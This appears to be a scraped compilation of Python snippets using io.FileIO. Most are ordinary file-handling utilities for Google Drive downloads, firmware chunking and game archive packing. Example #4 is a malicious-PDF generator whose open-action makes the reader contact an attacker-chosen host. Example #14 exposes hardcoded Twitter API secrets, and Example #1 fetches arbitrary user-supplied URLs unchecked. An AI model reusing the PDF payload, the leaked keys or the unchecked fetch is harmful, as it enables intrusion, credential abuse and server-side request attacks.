Example #1
def getOCR():

    if request.method == 'GET':
        # Get the image URL from the query string
        imageUrl = request.args.get('imageurl', '')

        # langcode is not used anywhere yet; it is kept because it will be
        # needed in the future.
        langcode = request.args.get('langcode', '')

        # Get api parameter value
        isAPI = request.args.get('api', '')

        # Create a unique file name based on time
        currentTime = str(datetime.datetime.now())
        getfileName = currentTime.replace(':', '_')
        getfileName = getfileName.replace(' ', '_')

        # Download the Image File
        r = requests.get(imageUrl, allow_redirects=True)
        fileName = getfileName + "." + r.headers.get('content-type').replace(
            'image/', '')
        open("ocr/" + fileName, 'wb').write(r.content)

        # Google Drive API Setup
        SCOPES = 'https://www.googleapis.com/auth/drive.file'
        store = file.Storage('token.json')
        creds = store.get()
        if not creds or creds.invalid:
            flow = client.flow_from_clientsecrets('client_secret.json', SCOPES)
            creds = tools.run_flow(flow, store)
        service = build('drive', 'v3', http=creds.authorize(Http()))

        # Upload the file to Google Drive
        folder_id = '1bUOQUn-ZYTpUYcMxD8myU9nKj2Vywtqo'
        mime = 'application/vnd.google-apps.document'
        file_metadata = {
            'name': fileName,
            'mimeType': mime,
            'parents': [folder_id]
        }
        media = MediaFileUpload("ocr/" + fileName, mimetype=mime)
        Imgfile = service.files().create(body=file_metadata,
                                         media_body=media,
                                         fields='id').execute()

        # Delete Img file locally.
        os.remove("ocr/" + fileName)

        # Download the file in txt format from Google Drive
        getTxt = service.files().export_media(fileId=Imgfile.get('id'),
                                              mimeType='text/plain')
        fh = io.FileIO("ocr/" + getfileName + ".txt", 'wb')
        downloader = MediaIoBaseDownload(fh, getTxt)
        downloader.next_chunk()

        # Read the exported text file and close the handle when done
        with io.open("ocr/" + getfileName + ".txt",
                     mode="r",
                     encoding="utf-8") as txtFile:
            OCRtext = txtFile.read()

        # Check if it is api request
        if "True" in isAPI:
            return jsonify({"text": OCRtext})

        # Return the html page with OCR data
        return render_template('getOCR.html',
                               imageUrl=imageUrl,
                               OCRtext=OCRtext)
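The snippet above assumes a Flask app and the Google API client libraries are already set up elsewhere in the module. A minimal sketch of the header it likely relies on; the route path and app name are assumptions inferred from the calls in the snippet:

# Imports inferred from the calls used in getOCR(); the @app.route path is hypothetical.
import datetime
import io
import os

import requests
from flask import Flask, request, jsonify, render_template
from httplib2 import Http
from oauth2client import file, client, tools
from googleapiclient.discovery import build
from googleapiclient.http import MediaFileUpload, MediaIoBaseDownload

app = Flask(__name__)

@app.route('/getOCR', methods=['GET'])  # hypothetical route name
def getOCR():
    ...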
Example #2
def writeToFile(fileData):
    with io.FileIO('./test.jpg', 'w') as file:
        file.write(fileData)
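io.FileIO always writes raw bytes, even when opened with mode "w", so the caller must pass bytes rather than str. A small usage sketch (the source path is hypothetical):

# Hypothetical usage: read raw bytes from an existing image and hand them to writeToFile().
with open('source.jpg', 'rb') as src:
    writeToFile(src.read())

# Text must be encoded first, since FileIO has no text mode.
writeToFile('not really a jpeg'.encode('utf-8'))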
Example #3
def get_readable_fileobj(name_or_obj, encoding=None, cache=False,
                         show_progress=True, remote_timeout=None):
    """
    Given a filename, pathlib.Path object or a readable file-like object, return a context
    manager that yields a readable file-like object.

    This supports passing filenames, URLs, and readable file-like objects,
    any of which can be compressed in gzip, bzip2 or lzma (xz) if the
    appropriate compression libraries are provided by the Python installation.

    Notes
    -----

    This function is a context manager, and should be used for example
    as::

        with get_readable_fileobj('file.dat') as f:
            contents = f.read()

    Parameters
    ----------
    name_or_obj : str or file-like object
        The filename of the file to access (if given as a string), or
        the file-like object to access.

        If a file-like object, it must be opened in binary mode.

    encoding : str, optional
        When `None` (default), returns a file-like object with a
        ``read`` method that returns `str` (``unicode``) objects, using
        `locale.getpreferredencoding` as an encoding.  This matches
        the default behavior of the built-in `open` when no ``mode``
        argument is provided.

        When ``'binary'``, returns a file-like object where its ``read``
        method returns `bytes` objects.

        When another string, it is the name of an encoding, and the
        file-like object's ``read`` method will return `str` (``unicode``)
        objects, decoded from binary using the given encoding.

    cache : bool, optional
        Whether to cache the contents of remote URLs.

    show_progress : bool, optional
        Whether to display a progress bar if the file is downloaded
        from a remote server.  Default is `True`.

    remote_timeout : float
        Timeout for remote requests in seconds (default is the configurable
        `astropy.utils.data.Conf.remote_timeout`, which is 3s by default)

    Returns
    -------
    file : readable file-like object
    """

    # close_fds is a list of file handles created by this function
    # that need to be closed.  We don't want to always just close the
    # returned file handle, because it may simply be the file handle
    # passed in.  In that case it is not the responsibility of this
    # function to close it: doing so could result in a "double close"
    # and an "invalid file descriptor" exception.
    PATH_TYPES = (str, pathlib.Path)

    close_fds = []
    delete_fds = []

    if remote_timeout is None:
        # use configfile default
        remote_timeout = conf.remote_timeout

    # Get a file object to the content
    if isinstance(name_or_obj, PATH_TYPES):
        # name_or_obj could be a Path object if pathlib is available
        name_or_obj = str(name_or_obj)

        is_url = _is_url(name_or_obj)
        if is_url:
            name_or_obj = download_file(
                name_or_obj, cache=cache, show_progress=show_progress,
                timeout=remote_timeout)
        fileobj = io.FileIO(name_or_obj, 'r')
        if is_url and not cache:
            delete_fds.append(fileobj)
        close_fds.append(fileobj)
    else:
        fileobj = name_or_obj

    # Check if the file object supports random access, and if not,
    # then wrap it in a BytesIO buffer.  It would be nicer to use a
    # BufferedReader to avoid loading the whole file into memory first,
    # but that is not compatible with streams or urllib2.urlopen
    # objects on Python 2.x.
    if not hasattr(fileobj, 'seek'):
        fileobj = io.BytesIO(fileobj.read())

    # Now read enough bytes to look at signature
    signature = fileobj.read(4)
    fileobj.seek(0)

    if signature[:3] == b'\x1f\x8b\x08':  # gzip
        import struct
        try:
            import gzip
            fileobj_new = gzip.GzipFile(fileobj=fileobj, mode='rb')
            fileobj_new.read(1)  # need to check that the file is really gzip
        except (OSError, EOFError, struct.error):  # invalid gzip file
            fileobj.seek(0)
            fileobj_new.close()
        else:
            fileobj_new.seek(0)
            fileobj = fileobj_new
    elif signature[:3] == b'BZh':  # bzip2
        try:
            import bz2
        except ImportError:
            for fd in close_fds:
                fd.close()
            raise ValueError(
                ".bz2 format files are not supported since the Python "
                "interpreter does not include the bz2 module")
        try:
            # bz2.BZ2File does not support file objects, only filenames, so we
            # need to write the data to a temporary file
            with NamedTemporaryFile("wb", delete=False) as tmp:
                tmp.write(fileobj.read())
                tmp.close()
                fileobj_new = bz2.BZ2File(tmp.name, mode='rb')
            fileobj_new.read(1)  # need to check that the file is really bzip2
        except OSError:  # invalid bzip2 file
            fileobj.seek(0)
            fileobj_new.close()
            # raise
        else:
            fileobj_new.seek(0)
            close_fds.append(fileobj_new)
            fileobj = fileobj_new
    elif signature[:3] == b'\xfd7z':  # xz
        try:
            import lzma
            fileobj_new = lzma.LZMAFile(fileobj, mode='rb')
            fileobj_new.read(1)  # need to check that the file is really xz
        except ImportError:
            for fd in close_fds:
                fd.close()
            raise ValueError(
                ".xz format files are not supported since the Python "
                "interpreter does not include the lzma module.")
        except (OSError, EOFError) as e:  # invalid xz file
            fileobj.seek(0)
            fileobj_new.close()
            # should we propagate this to the caller to signal bad content?
            # raise ValueError(e)
        else:
            fileobj_new.seek(0)
            fileobj = fileobj_new

    # By this point, we have a file, io.FileIO, gzip.GzipFile, bz2.BZ2File
    # or lzma.LZMAFile instance opened in binary mode (that is, read
    # returns bytes).  Now we need to, if requested, wrap it in a
    # io.TextIOWrapper so read will return unicode based on the
    # encoding parameter.

    needs_textio_wrapper = encoding != 'binary'

    if needs_textio_wrapper:
        # A bz2.BZ2File can not be wrapped by a TextIOWrapper,
        # so we decompress it to a temporary file and then
        # return a handle to that.
        try:
            import bz2
        except ImportError:
            pass
        else:
            if isinstance(fileobj, bz2.BZ2File):
                tmp = NamedTemporaryFile("wb", delete=False)
                data = fileobj.read()
                tmp.write(data)
                tmp.close()
                delete_fds.append(tmp)

                fileobj = io.FileIO(tmp.name, 'r')
                close_fds.append(fileobj)

        fileobj = io.BufferedReader(fileobj)
        fileobj = io.TextIOWrapper(fileobj, encoding=encoding)

        # Ensure that file is at the start - io.FileIO will for
        # example not always be at the start:
        # >>> import io
        # >>> f = open('test.fits', 'rb')
        # >>> f.read(4)
        # 'SIMP'
        # >>> f.seek(0)
        # >>> fileobj = io.FileIO(f.fileno())
        # >>> fileobj.tell()
        # 4096L

        fileobj.seek(0)

    try:
        yield fileobj
    finally:
        for fd in close_fds:
            fd.close()
        for fd in delete_fds:
            os.remove(fd.name)
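A usage sketch for the context manager above (in the real module the generator is presumably wrapped with contextlib.contextmanager; the file names and URL here are hypothetical):

# Hypothetical usage: the gzip/bzip2/xz sniffing above is transparent to the caller.
with get_readable_fileobj('catalog.dat.gz', encoding='binary') as f:
    raw = f.read()        # bytes, already decompressed

with get_readable_fileobj('https://example.com/table.csv', cache=True) as f:
    text = f.read()       # str, decoded with locale.getpreferredencoding()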
Example #4
def create_malpdf(filename, host):
    print("[*] Starting Process.. [*]")
    with io.FileIO(filename, "w") as file:
        file.write('''
%PDF-1.7

1 0 obj
<</Type/Catalog/Pages 2 0 R>>
endobj
2 0 obj
<</Type/Pages/Kids[3 0 R]/Count 1>>
endobj
3 0 obj
<</Type/Page/Parent 2 0 R/MediaBox[0 0 612 792]/Resources<<>>>>
endobj
xref
0 4
0000000000 65535 f
0000000015 00000 n
0000000060 00000 n
0000000111 00000 n
trailer
<</Size 4/Root 1 0 R>>
startxref
190
3 0 obj
<< /Type /Page
   /Contents 4 0 R

   /AA <<
	   /O <<
	      /F (''' + host + '''test)
		  /D [ 0 /Fit]
		  /S /GoToE
		  >>

	   >>

	   /Parent 2 0 R
	   /Resources <<
			/Font <<
				/F1 <<
					/Type /Font
					/Subtype /Type1
					/BaseFont /Helvetica
					>>
				  >>
				>>
>>
endobj


4 0 obj<< /Length 100>>
stream
BT
/TI_0 1 Tf
14 0 0 14 10.000 753.976 Tm
0.0 0.0 0.0 rg
(PDF Document) Tj
ET
endstream
endobj


trailer
<<
	/Root 1 0 R
>>

%%EOF
''')
Example #5
    def download(self,
                 fileID,
                 path,
                 skipHash=False
                 ):  #Downloads a file. If a folder, pass to downloadFolder()
        #if '-nohash' in args:
        #    skipHash = True

        if path[-1] != '/':
            path += '/'
        if not os.path.exists(path):
            os.makedirs(path)

        metaData = self.service.files().get(fileId=fileID,
                                            fields='name, mimeType, size',
                                            supportsAllDrives=True).execute()
        mimetype = metaData['mimeType']
        name = metaData['name']

        if 'google-apps' in mimetype:
            if mimetype == 'application/vnd.google-apps.folder':  #If file is folder
                self.downloadFolder(fileID, path, skipHash=skipHash)
                return True
            else:  #Skip Google files, as they require their own download process
                print(
                    'ERROR: Unable to download Google files (docs, sheets, etc)'
                )
                return False

        size = metaData['size']

        print('Downloading file \"{}\"'.format(name))

        if size == '0':
            with open(path + name, 'w') as f:
                pass
        else:
            request = self.service.files().get_media(fileId=fileID)
            fh = io.FileIO(path + name, 'wb')
            self.downloader = MediaIoBaseDownload(fh, request)
            self.done = False

            errorCounter = 1
            maxErrors = 5
            done = False
            while done is False:
                while True:
                    try:
                        status, done = self.downloader.next_chunk()
                        break
                    except HttpError as e:  #Wait 2 seconds then retry download request. Need to implement exponential backoff decorator
                        status_code = e.resp['status']
                        print('HttpError {}: Retrying request ({}/{}).'.format(
                            status_code, errorCounter, maxErrors))
                        errorCounter += 1
                        sleep(2)
                        if errorCounter > maxErrors:
                            print('Skipping file \"{}\"...\n'.format(name))
                            done = True
                            return False

            if not skipHash:
                print('checking hash...')
                if self.getMd5(fileID) != self.calculateMd5(path + name):
                    print('ERROR: Checksums do not match')
        print('File \"{}\" downloaded\n'.format(path + name))
Example #6
parser.add_argument(
    '--min_duration',
    default=1,
    type=int,
    help=
    'Prunes any samples shorter than the min duration (given in seconds, default 1)'
)
parser.add_argument(
    '--max_duration',
    default=15,
    type=int,
    help=
    'Prunes any samples longer than the max duration (given in seconds, default 15)'
)
parser.add_argument('--output_path',
                    default='merged_manifest.csv',
                    help='Output path to merged manifest')

args = parser.parse_args()

file_paths = []
for file in os.listdir(args.merge_dir):
    if file.endswith(".csv"):
        with open(os.path.join(args.merge_dir, file), 'r') as fh:
            file_paths += fh.readlines()
file_paths = [file_path.split(',')[0] for file_path in file_paths]
file_paths = order_and_prune_files(file_paths, args.min_duration,
                                   args.max_duration)
with io.FileIO(args.output_path, "w") as file:
    for wav_path in tqdm(file_paths, total=len(file_paths)):
        transcript_path = wav_path.replace('/wav/',
                                           '/txt/').replace('.wav', '.txt')
        sample = os.path.abspath(wav_path) + ',' + os.path.abspath(
            transcript_path) + '\n'
        file.write(sample.encode('utf-8'))
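The script above calls order_and_prune_files(), which is not shown in this snippet. A hypothetical sketch of such a helper, assuming durations are read from the wav headers with the standard wave module:

import contextlib
import wave

def order_and_prune_files(paths, min_duration, max_duration):
    # Hypothetical helper: keep files whose duration falls inside the window,
    # returned shortest-first for the merged manifest.
    durations = {}
    for path in paths:
        with contextlib.closing(wave.open(path, 'r')) as wav:
            durations[path] = wav.getnframes() / float(wav.getframerate())
    kept = [p for p in paths if min_duration <= durations[p] <= max_duration]
    return sorted(kept, key=durations.get)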
Example #7
flow = google_auth_oauthlib.flow.InstalledAppFlow.from_client_secrets_file(
    client_secrets_file, scopes)
credentials = flow.run_console()
youtube = googleapiclient.discovery.build(api_service_name,
                                          api_version,
                                          credentials=credentials)
# Grab caption ID from video
request = youtube.captions().list(videoId=youtubevideo, part="snippet")
captionid = ''
response = request.execute()
for i in response['items']:
    if i['snippet']['language'] == 'en':
        captionid = i['id']
# Download caption file.
request = youtube.captions().download(id=captionid)
fh = io.FileIO('captions_EN.svb', 'wb')
download = MediaIoBaseDownload(fh, request)
complete = False
while not complete:
    status, complete = download.next_chunk()
# Read caption file
with open('captions_EN.svb', "r", encoding='utf-8') as myfile:
    input = myfile.readlines()


# Translate function
def translate(langout):
    deepl_url = 'https://api.deepl.com/v2/translate?'
    data = {
        'auth_key': deeplkey,
        'text': input,
Example #8
    def makeChunksEXT4FS(self, name):
        """
		Generate one or more .chunks files assuming an EXT4 FS
		"""

        os.chdir(os.path.dirname(name))
        name = os.path.basename(name)
        baseName = name.rpartition(".")[0] + "_"
        sliceName = name.rpartition(".")[0].encode("utf8")

        # Check length before closing
        eof = self.file.seek(0, io.SEEK_END)

        # Alas, ext2simg can't take the image as stdin
        self.file.close()

        sparse = EXT4SparseFile(name, 1 << self.blockShift)

        # sigh, Python 2 hack for some variables
        class nl:
            yuck = "truly"

        nl.current = 0
        nl.targetAddr = self.startLBA
        nl.trimCount = 0

        # local function not used by anyone else
        def complete():
            #			nonlocal zlen, md5, current, targetAddr, trimCount
            zdata = zobj.flush(zlib.Z_FINISH)
            nl.zlen += len(zdata)
            out.write(zdata)
            nl.md5 = nl.md5.digest()

            out.seek(0, io.SEEK_SET)

            values = {
                'sliceName': sliceName,
                'chunkName': chunkName,
                'targetSize': dataBlocks << self.blockShift,
                'dataSize': nl.zlen,
                'md5': nl.md5,
                'targetAddr': nl.targetAddr,
                'trimCount': nl.trimCount,
                'crc32': crc & 0xFFFFFFFF,
                'dev': self.dev,
            }

            nl.header = self.packdict(values)
            out.write(nl.header)
            out.close()

            nl.current += nl.trimCount << self.blockShift
            nl.targetAddr = self.startLBA + (nl.current >> self.blockShift)

            print("({:d} empty blocks)".format(nl.trimCount - dataBlocks))

            nl.trimCount = 0

        for chunk in sparse:
            if chunk.type == EXT4SparseChunk.typeRaw or chunk.type == EXT4SparseChunk.typeFill:
                if nl.trimCount:
                    complete()
                dataBlocks = chunk.remaining >> self.blockShift
                nl.trimCount += dataBlocks

                nl.md5 = hashlib.md5()
                crc = crc32(b"")
                zobj = zlib.compressobj(1)

                chunkName = baseName + str(nl.targetAddr) + ".bin"
                out = io.FileIO(chunkName + ".chunk", "wb")

                sys.stdout.write("[+] Compressing {:s} to {:s} ".format(
                    name, chunkName))

                chunkName = chunkName.encode("utf8")
                out.seek(self._dz_length, io.SEEK_SET)
                nl.zlen = 0

                for buf in chunk:
                    nl.md5.update(buf)
                    crc = crc32(buf, crc)
                    zdata = zobj.compress(buf)
                    nl.zlen += len(zdata)
                    out.write(zdata)

            elif chunk.type == EXT4SparseChunk.typeDontCare:
                # check for EOF, lastWipe overrides
                if sparse.chunkCount == 0:
                    nl.trimCount = self.lastWipe - nl.targetAddr
                else:
                    nl.trimCount += chunk.remaining >> self.blockShift
                complete()

            elif chunk.type == EXT4SparseChunk.typeCrc32:
                pass
            else:
                print("[!] Error: unknown chunk, type=0x{:04X}".format(
                    chunk.type),
                      file=sys.stderr)
                sys.exit(64)

        if nl.trimCount:
            nl.trimCount = self.lastWipe - nl.targetAddr
            complete()

        print("[+] done\n")
Example #9
    def makeChunksProbe(self, name):
        """
		Generate one or more .chunks files for the named file
		"""

        os.chdir(os.path.dirname(name))
        name = os.path.basename(name)
        baseName = name.rpartition(".")[0] + "_"
        sliceName = name.rpartition(".")[0].encode("utf8")

        current = 0
        targetAddr = self.startLBA
        eof = self.file.seek(0, io.SEEK_END)
        self.file.seek(0, io.SEEK_SET)

        # emulate characteristics of LG's tool, always find a block at start
        readSize = self.blockSize << 10

        md5 = hashlib.md5()
        crc = crc32(b"")
        zobj = zlib.compressobj(1)
        self.file.seek(current, io.SEEK_SET)

        chunkName = baseName + str(targetAddr) + ".bin"
        out = io.FileIO(chunkName + ".chunk", "wb")

        sys.stdout.write("[+] Compressing {:s} to {:s} ".format(
            name, chunkName))

        chunkName = chunkName.encode("utf8")
        out.seek(self._dz_length, io.SEEK_SET)
        zlen = 0

        wipeData = readSize
        dataCount = readSize

        buf = self.file.read(readSize)

        while len(buf.lstrip(b'\x00')) == 0 and current < eof:
            md5.update(buf)
            crc = crc32(buf, crc)
            zdata = zobj.compress(buf)
            zlen += len(zdata)
            out.write(zdata)
            wipeData += readSize
            dataCount += readSize
            current += readSize

            buf = self.file.read(readSize)

        while current < eof:

            while len(buf.lstrip(b'\x00')) != 0 and current < eof:
                md5.update(buf)
                crc = crc32(buf, crc)
                zdata = zobj.compress(buf)
                zlen += len(zdata)
                out.write(zdata)
                wipeData += readSize
                dataCount += readSize
                current += readSize

                buf = self.file.read(readSize)

            zdata = zobj.flush(zlib.Z_FINISH)
            zlen += len(zdata)
            out.write(zdata)
            md5 = md5.digest()

            while len(buf.lstrip(b'\x00')) == 0 and current < eof:
                wipeData += readSize
                current += readSize
                buf = self.file.read(readSize)

            print("({:d} empty blocks)".format((wipeData -
                                                dataCount) >> self.blockShift))

            out.seek(0, io.SEEK_SET)

            values = {
                'sliceName': sliceName,
                'chunkName': chunkName,
                'targetSize': dataCount,
                'dataSize': zlen,
                'md5': md5,
                'targetAddr': targetAddr,
                'trimCount': wipeData >> self.blockShift,
                'crc32': crc & 0xFFFFFFFF,
                'dev': self.dev,
            }

            header = self.packdict(values)
            out.write(header)
            out.close()

            targetAddr = self.startLBA + (current >> self.blockShift)

            if current < eof:

                md5 = hashlib.md5()
                crc = crc32(b"")
                zobj = zlib.compressobj(1)

                chunkName = baseName + str(targetAddr) + ".bin"
                out = io.FileIO(chunkName + ".chunk", "wb")

                sys.stdout.write("[+] Compressing {:s} to {:s} ".format(
                    name, chunkName))

                chunkName = chunkName.encode("utf8")
                out.seek(self._dz_length, io.SEEK_SET)
                zlen = 0

                wipeData = readSize
                dataCount = readSize

        print("[+] done\n")
Example #10
    def pack_lin(self, dir):

        # Collect our files.
        file_list = sorted(list_all_files(dir))

        txt = [
            filename for filename in file_list
            if os.path.splitext(filename)[1].lower() == ".txt"
        ]
        wrd = [
            filename for filename in file_list
            if os.path.splitext(filename)[1].lower() == ".wrd"
        ]
        py = [
            filename for filename in file_list
            if os.path.splitext(filename)[1].lower() == ".py"
        ]

        # If there is more than one for whatever reason, just take the first.
        # We only have use for a single wrd or python file.
        wrd = wrd[0] if wrd else None
        py = py[0] if py else None

        # Prepare our temporary output directory.
        temp_dir = tempfile.mkdtemp(prefix="sdse-")

        # Where we're outputting our wrd file, regardless of whether it's a python
        # file or a raw binary data file.
        wrd_dst = os.path.join(temp_dir, "0.scp.wrd")

        if py:
            # _LOGGER.info("Compiling %s to binary." % py)
            try:
                wrd_file = WrdFile(py)
            except:
                _LOGGER.warning(
                    "%s failed to compile. Parsing wrd file instead. Exception info:\n%s"
                    % (py, traceback.format_exc()))
                shutil.copy(wrd, wrd_dst)
            else:
                # If we succeeded in loading the python file, compile it to binary.
                # wrd_file.save_bin(wrd)
                wrd_file.save_bin(wrd_dst)

        else:
            shutil.copy(wrd, wrd_dst)

        # Pack the text files in-place to save us a bunch of copying
        # and then move it to the tmp directory with the wrd file.
        if txt:
            with io.FileIO(os.path.join(temp_dir, "1.dat"), "w") as h:
                self.pack_dir(dir, h, file_list=txt)

        # Then pack it like normal.
        data = io.BytesIO()
        with io.BufferedWriter(data) as h:
            self.pack_dir(temp_dir, h)
            h.flush()
            data = data.getvalue()

        shutil.rmtree(temp_dir)

        return data
Example #11
    def makeChunksHoles(self, name):
        """
		Generate one or more .chunks files for the named file
		"""

        os.chdir(os.path.dirname(name))
        name = os.path.basename(name)
        baseName = name.rpartition(".")[0] + "_"
        sliceName = name.rpartition(".")[0].encode("utf8")

        current = 0
        targetAddr = self.startLBA
        eof = self.file.seek(0, io.SEEK_END)
        self.file.seek(0, io.SEEK_SET)

        while current < eof:
            hole = (self.file.seek(current, SEEK_HOLE) + self.blockSize -
                    1) & ~(self.blockSize - 1)
            # Python's handling of this condition is suboptimal
            try:
                next = self.file.seek(hole, SEEK_DATA) & ~(self.blockSize - 1)
                trimCount = (next - current) >> self.blockShift
            except IOError:
                next = eof
                trimCount = self.lastWipe - targetAddr

            # Watch out for chunks >4GB (too big!)
            # Also, try not to test the limits of LG's tools...
            if (hole - current) >= 1 << 27:
                hole = current + (1 << 27)
                next = hole
                trimCount = (next - current) >> self.blockShift

            md5 = hashlib.md5()
            crc = crc32(b"")
            zobj = zlib.compressobj(1)
            self.file.seek(current, io.SEEK_SET)

            chunkName = baseName + str(targetAddr) + ".bin"
            out = io.FileIO(chunkName + ".chunk", "wb")

            print("[+] Compressing {:s} to {:s} ({:d} empty blocks)".format(
                name, chunkName, (next - hole) >> self.blockShift))

            chunkName = chunkName.encode("utf8")
            out.seek(self._dz_length, io.SEEK_SET)
            zlen = 0

            for b in range((hole - current) >> self.blockShift):
                buf = self.file.read(self.blockSize)
                md5.update(buf)
                crc = crc32(buf, crc)
                zdata = zobj.compress(buf)
                zlen += len(zdata)
                out.write(zdata)

            zdata = zobj.flush(zlib.Z_FINISH)
            zlen += len(zdata)
            out.write(zdata)
            md5 = md5.digest()

            out.seek(0, io.SEEK_SET)

            values = {
                'sliceName': sliceName,
                'chunkName': chunkName,
                'targetSize': hole - current,
                'dataSize': zlen,
                'md5': md5,
                'targetAddr': targetAddr,
                'trimCount': trimCount,
                'crc32': crc & 0xFFFFFFFF,
                'dev': self.dev,
            }

            header = self.packdict(values)
            out.write(header)
            out.close()

            current = next
            targetAddr = self.startLBA + (current >> self.blockShift)

        print("[+] done\n")
Example #12
    def create_archives(self):

        try:
            self.width = self.parent.width()
            self.height = self.parent.height()
            self.x = self.parent.x()
            self.y = self.parent.y()
        except:
            self.width = 1920
            self.height = 1080
            self.x = 0
            self.y = 0

        self.file_count = 0

        self.progress = QProgressDialog("Reading...", QtCore.QString(), 0,
                                        72000, self.parent)
        self.progress.setWindowModality(Qt.Qt.WindowModal)
        self.progress.setValue(0)
        self.progress.setAutoClose(False)
        self.progress.setMinimumDuration(0)

        # with open(common.editor_config.eboot_orig, "rb") as f:
        with open(
                os.path.join(common.editor_config.iso_dir, "PSP_GAME",
                             "SYSDIR", "EBOOT.BIN"), "rb") as f:
            eboot = BitStream(bytes=f.read())

        eboot, eboot_offset = eboot_patch.apply_eboot_patches(eboot)

        USRDIR = os.path.join(common.editor_config.iso_dir, "PSP_GAME",
                              "USRDIR")

        # So we can loop. :)
        ARCHIVE_INFO = [
            {
                "toc": UMDIMAGES.umdimage,
                "dir": common.editor_config.umdimage_dir,
                "dat": os.path.join(USRDIR, "umdimage.dat"),
                "name": "umdimage.dat",
                "pack": common.editor_config.pack_umdimage,
                "eof": False,
            },
            {
                "toc": UMDIMAGES.umdimage2,
                "dir": common.editor_config.umdimage2_dir,
                "dat": os.path.join(USRDIR, "umdimage2.dat"),
                "name": "umdimage2.dat",
                "pack": common.editor_config.pack_umdimage2,
                "eof": False,
            },
            {
                "toc": None,
                "dir": common.editor_config.voice_dir,
                "dat": os.path.join(USRDIR, "voice.pak"),
                "name": "voice.pak",
                "pack": common.editor_config.pack_voice,
                "eof": True,
            },
            {
                "toc": None,
                "dir": common.editor_config.bgm_dir,
                "dat": os.path.join(USRDIR, "bgm.pak"),
                "name": "bgm.pak",
                "pack": common.editor_config.pack_bgm,
                "eof": True,
            },
        ]

        for archive in ARCHIVE_INFO:

            if not archive["pack"]:
                continue

            self.progress.setWindowTitle("Building " + archive["name"])

            toc_info = {}
            file_list = None

            if archive["toc"]:
                file_list = []

                toc = get_toc(eboot, archive["toc"])

                for entry in toc:
                    filename = entry["filename"]
                    pos_pos = entry["file_pos_pos"]
                    len_pos = entry["file_len_pos"]

                    toc_info[filename] = [pos_pos, len_pos]
                    file_list.append(filename)

            # Causes memory issues if I use the original order, for whatever reason.
            file_list = None

            with io.FileIO(archive["dat"], "w") as handler:
                table_of_contents = self.pack_dir(archive["dir"],
                                                  handler,
                                                  file_list=file_list,
                                                  eof=archive["eof"])

            # We're playing fast and loose with the file count anyway, so why not?
            self.file_count += 1
            self.progress.setValue(self.file_count)
            self.progress.setLabelText("Saving " + archive["name"] + "...")

            if archive["toc"]:
                for entry in table_of_contents:
                    if entry not in toc_info:
                        _LOGGER.warning(
                            "%s missing from %s table of contents." %
                            (entry, archive["name"]))
                        continue

                    file_pos = table_of_contents[entry]["pos"]
                    file_size = table_of_contents[entry]["size"]

                    eboot.overwrite(BitStream(uintle=file_pos, length=32),
                                    toc_info[entry][0] * 8)
                    eboot.overwrite(BitStream(uintle=file_size, length=32),
                                    toc_info[entry][1] * 8)

            del table_of_contents

        self.progress.setLabelText("Saving EBOOT.BIN...")
        self.progress.setValue(self.progress.maximum())

        # Text replacement
        to_replace = eboot_text.get_eboot_text()
        for replacement in to_replace:

            orig = bytearray(replacement.orig, encoding=replacement.enc)

            # If they left something blank, write the original text back.
            if len(replacement.text) == 0:
                data = orig
            else:
                data = bytearray(replacement.text, encoding=replacement.enc)

            pos = replacement.pos.int + eboot_offset

            padding = len(orig) - len(data)
            if padding > 0:
                # Null bytes to fill the rest of the space the original took.
                data.extend(bytearray(padding))

            data = ConstBitStream(bytes=data)
            eboot.overwrite(data, pos * 8)

        eboot_out = os.path.join(common.editor_config.iso_dir, "PSP_GAME",
                                 "SYSDIR", "EBOOT.BIN")

        with open(eboot_out, "wb") as f:
            eboot.tofile(f)

        self.progress.close()
Example #13
def save_file_in_path(file_path, file_content, file_name):
    with io.FileIO(file_path, "wb") as fn:
        fn.write(file_content)
    return True
Example #14
def main_func(user_screen_name, tweets_count):
    from apiclient import discovery
    from httplib2 import Http
    import oauth2client
    from oauth2client import file, client, tools
    import io
    from googleapiclient.http import MediaIoBaseDownload
    import tweepy
    import csv
    import pandas as pd
    from bs4 import BeautifulSoup
    from nltk.tokenize import WordPunctTokenizer
    from nltk.stem.wordnet import WordNetLemmatizer
    from nltk.stem.lancaster import LancasterStemmer
    from gensim.models import Word2Vec
    import multiprocessing
    from nltk.corpus import stopwords
    import re
    import pickle
    import numpy as np
    from sklearn.model_selection import train_test_split
    import tensorflow as tf
    from tensorflow.contrib.tensorboard.plugins import projector
    import gensim
    import os
    import warnings
    import nltk
    warnings.filterwarnings(action='ignore',
                            category=UserWarning,
                            module='gensim')
    pd.options.mode.chained_assignment = None
    pd.set_option('display.max_columns', 7)
    nltk.download('stopwords')
    nltk.download('wordnet')

    obj = lambda: None
    lmao = {
        "auth_host_name": 'localhost',
        'noauth_local_webserver': 'store_true',
        'auth_host_port': [8080, 8090],
        'logging_level': 'ERROR'
    }
    for k, v in lmao.items():
        setattr(obj, k, v)

    SCOPES = 'https://www.googleapis.com/auth/drive.readonly'
    store = file.Storage('token.json')
    creds = store.get()

    if not creds or creds.invalid:
        flow = client.flow_from_clientsecrets('client_id.json', SCOPES)
        creds = tools.run_flow(flow, store, obj)

    DRIVE = discovery.build('drive', 'v3', http=creds.authorize(Http()))

    file_id = '1gN9u4zFWfwR5n-LmBwrcwmNGIUKj4Y0F'
    request = DRIVE.files().get_media(fileId=file_id)

    fh = io.FileIO('lemmatization_nolim_all.sav', mode='w')
    downloader = MediaIoBaseDownload(fh, request)
    done = False
    while done is False:
        status, done = downloader.next_chunk()
        print("Download %d%%." % int(status.progress() * 100))

    predict_model = 'lemmatization_nolim_all.sav'
    # parent_patch = os.getcwd()
    path = "test"
    stopWords = set(stopwords.words('english'))

    consumer_key = 'NgbszsMy18esxzBRpnS6YJSg5'
    consumer_secret = 'fUlGwElm7B7Q5UUl99TdnMewBA3xW9Cw5xmzBAq1xU9j5O6wUa'
    access_key = '3847979172-1TNy6qbn1DvF2lHuUMpM86hAyRSxN8Uc9WpZzET'  # access_token
    access_secret = 'ZCooGbFqAqxCyFtZGqMPczAhD6IkZW1TfT1hocKVPm8pV'

    tok = WordPunctTokenizer()

    pat1 = r'@[A-Za-z0-9_]+'
    pat2 = r'https?://[^ ]+'
    combined_pat = r'|'.join((pat1, pat2))
    www_pat = r'www.[^ ]+'
    negations_dic = {
        "isn't": "is not",
        "aren't": "are not",
        "wasn't": "was not",
        "weren't": "were not",
        "haven't": "have not",
        "hasn't": "has not",
        "hadn't": "had not",
        "won't": "will not",
        "wouldn't": "would not",
        "don't": "do not",
        "doesn't": "does not",
        "didn't": "did not",
        "can't": "can not",
        "couldn't": "could not",
        "shouldn't": "should not",
        "mightn't": "might not",
        "mustn't": "must not"
